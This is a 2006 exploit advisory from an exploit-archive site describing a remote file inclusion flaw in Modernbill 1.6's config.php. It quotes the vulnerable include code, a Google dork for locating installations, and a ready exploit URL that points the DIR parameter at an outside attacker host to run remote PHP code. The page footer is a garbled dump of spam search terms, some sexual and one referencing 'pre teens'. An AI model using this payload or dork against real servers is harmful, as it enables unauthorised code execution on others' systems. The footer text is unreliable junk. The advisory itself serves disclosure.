about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Modernbill <= 1.6 (config.php) Remote File Include Vulnerability




2006-08-07 Modernbill <= 1.6 (config.php) Remote File Include Vulnerability
Rated as : High Risk

#############################SolpotCrew
Community################################
#
# modernbill ver 1.6 (DIR) Remote File Inclusion
#
# Download file : http://freshmeat.net/projects/modernbill/
#
#################################################################################
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006)
#
# contact: chris_hasibuan@yahoo.com
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt
#
################################################################################
#
#
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "DIR" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from include/html/config.php

//include($DIR."include/misc/mod_sessions/session_functions.inc.php");
#session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql_write","sess_mysql_destroy","sess_mysql_gc");
//session_start();
session_register("set_language");
session_register("v");
$new_language = ($set_language) ? $set_language : NULL ;
$signup_form = TRUE;
include_once($DIR."include/functions.inc.php");
## ------------------------------------------------------
## DO NOT CHANGE STOP
## ------------------------------------------------------

google dork : allinurl:/modernbill/

exploit:
http://somehost/modernbill/include/html/config.php?DIR=http://evilcode

##############################MY LOVE JUST FOR U
RIE#########################
######################################E.O.F##################################
securitydot.net - 2006-08-07

Advertising

Copyright 2007, SecurityDot
Fri, 27 Nov 2009 06:36:57 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo knepix auto admin sex22 www.ikaca. knepix pro ftp Indiansex. www.xxx.se Dogs S e x phot srpc chathurika pre teens ebonyass t285t CHUDAI www.tamils sex,vedio Admin_file naked babs CHUDAI webcalenda WWW.REDTUB wow.98ssf. soft.jshuw www.yiruis pourn sex. CMS is Fre download l Dropbear s http://www nu-market. CALL GALS www.taobao www.sdfrdg big teets 200 /compo lib/armyga pornoxxl TAMIL.SEX. 0756.teamb www.cjsljx server ser www.sex ar www.llfw.n p...x/rfi. sexfukingg t383t www.xhfgg.